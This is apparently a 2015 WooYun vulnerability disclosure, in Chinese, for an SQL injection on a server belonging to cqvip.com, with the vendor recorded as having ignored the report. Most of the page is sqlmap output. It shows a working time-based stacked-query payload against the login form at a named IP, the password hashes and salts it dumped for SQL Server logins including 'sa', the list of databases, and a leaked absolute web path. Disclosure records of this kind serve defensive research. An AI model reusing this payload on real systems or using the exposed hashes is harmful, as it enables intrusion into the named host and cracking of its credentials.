当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100819

漏洞标题:维普网某站SQL注射及信息漏洞

相关厂商:cqvip.com

漏洞作者: 路人甲

提交时间:2015-03-12 19:22

修复时间:2015-03-17 19:24

公开时间:2015-03-17 19:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-12: 细节已通知厂商并且等待厂商处理中
2015-03-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

维普网某站SQL注射及信息漏洞

详细说明:

1#注射站点

http://119.84.8.90:80//index.asp


注射信息

sqlmap identified the following injection points with a total of 143 HTTP(s) requests:
---
Parameter: username (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: username=tEQa';WAITFOR DELAY '0:0:5'--&password=
---
do you want to exploit this SQL injection? [Y/n] Y
[22:52:25] [INFO] testing Microsoft SQL Server
[22:52:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[22:52:33] [INFO] confirming Microsoft SQL Server
[22:52:43] [INFO] adjusting time delay to 1 second due to good response times
[22:52:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008


数据库信息

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01008edaea88dfc85e50257861dd2173024d4a0111247bd97fb3
header: 0x0100
salt: 8edaea88
mixedcase: dfc85e50257861dd2173024d4a0111247bd97fb3
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x01006f5e736b640f7c93ca886edbe10c493aeecd44a167b31cb5
header: 0x0100
salt: 6f5e736b
mixedcase: 640f7c93ca886edbe10c493aeecd44a167b31cb5
[*] FPDUser [1]:
password hash: 0x01004e3a192dc92fd77abd982c2a49e7049dddd076dab3d8d012
header: 0x0100
salt: 4e3a192d
mixedcase: c92fd77abd982c2a49e7049dddd076dab3d8d012
[*] sa [1]:
password hash: 0x0100e82f63c99464db88fa27ba39cd9559d3f55f8c3bf94c7303
header: 0x0100
salt: e82f63c9
mixedcase: 9464db88fa27ba39cd9559d3f55f8c3bf94c7303


current database:    'FMIF_WT'
available databases [7]:
[*] [tempdbQ}\t\x11]
[*] FMIF_WT
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB


2#数据库绝对路径泄露

http://119.84.8.90/ip.asp


PATH_TRANSLATED = D:\FPD2012Webroot\FPDSYStem\html\ip.asp

漏洞证明:

current database:    'FMIF_WT'
available databases [7]:
[*] [tempdbQ}\t\x11]
[*] FMIF_WT
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB

修复方案:

过滤,删除不需要的页面。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-17 19:24

厂商回复:

最新状态:

暂无